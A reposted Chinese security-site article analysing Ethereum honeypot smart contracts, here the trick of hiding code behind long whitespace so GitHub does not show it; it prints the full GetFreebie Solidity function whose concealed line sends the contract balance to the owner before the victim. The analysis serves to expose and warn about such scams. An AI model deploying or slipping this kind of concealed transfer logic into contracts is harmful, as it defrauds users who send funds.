为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

以太坊蜜罐智能合约之古老的欺骗手段

2018-7-21 03:16| 投稿: xiaotiger |来自: 互联网

摘要: 在互联网界,蜜罐是一种软件应用系统,用来当做入侵诱饵,引诱黑客前来攻击。攻击者入侵后,通过监测与分析,就可以知道攻击者是如何入侵的,以便随时了解针对组织服务器发动的最新攻击和漏洞。还可以通过窃听黑客之 ...

在互联网界,蜜罐是一种软件应用系统,用来当做入侵诱饵,引诱黑客前来攻击。攻击者入侵后,通过监测与分析,就可以知道攻击者是如何入侵的,以便随时了解针对组织服务器发动的最新攻击和漏洞。还可以通过窃听黑客之间的联系,收集黑客所用的种种工具,并且掌握他们的社交网络。

本文将对文中和评论中提到的 smart-contract-honeypots 和 Solidlity-Vulnerable 项目中的各蜜罐智能合约进行分析,根据分析结果将蜜罐智能合约的欺骗手段分为以下四个方面:分别为古老欺骗手段、神奇的逻辑漏洞、新颖的赌博游戏、黑客的漏洞利用。

古老欺骗手段—超长空格的欺骗

对于该类蜜罐合约来说,仅仅使用最原始的欺骗手法。这种手法是拙劣的,但也有着一定的诱导性。

只要转账金额大于1 eher,就可以取走智能合约里所有的以太币。

实际上github上不会显示超长空格的代码,如果我们仔细检查的话会发现,还有一段代码

实际上完整代码应该是:

function GetFreebie

public

payable

{

if(msg.value>1 ether)

{ Owner.transfer(this.balance);

msg.sender.transfer(this.balance);

}

}

该段代码实际上是先将账户余额转给合约的创立者,然后再将剩余的账户余额(账户余额为0)转给转账的用户(受害者)。

相似的智能合约还有TestToken。

隐藏前

实际上

对于该类蜜罐合约来说,该欺骗手法是十分拙劣的,虽说是最原始的欺骗手法,但也有一定的诱导性,如过不多加留意,很容易掉坑。


小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6580273263648178695/

免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人
1

路过

鸡蛋

刚表态过的朋友 (1 人)

相关阅读

最新评论

最新

返回顶部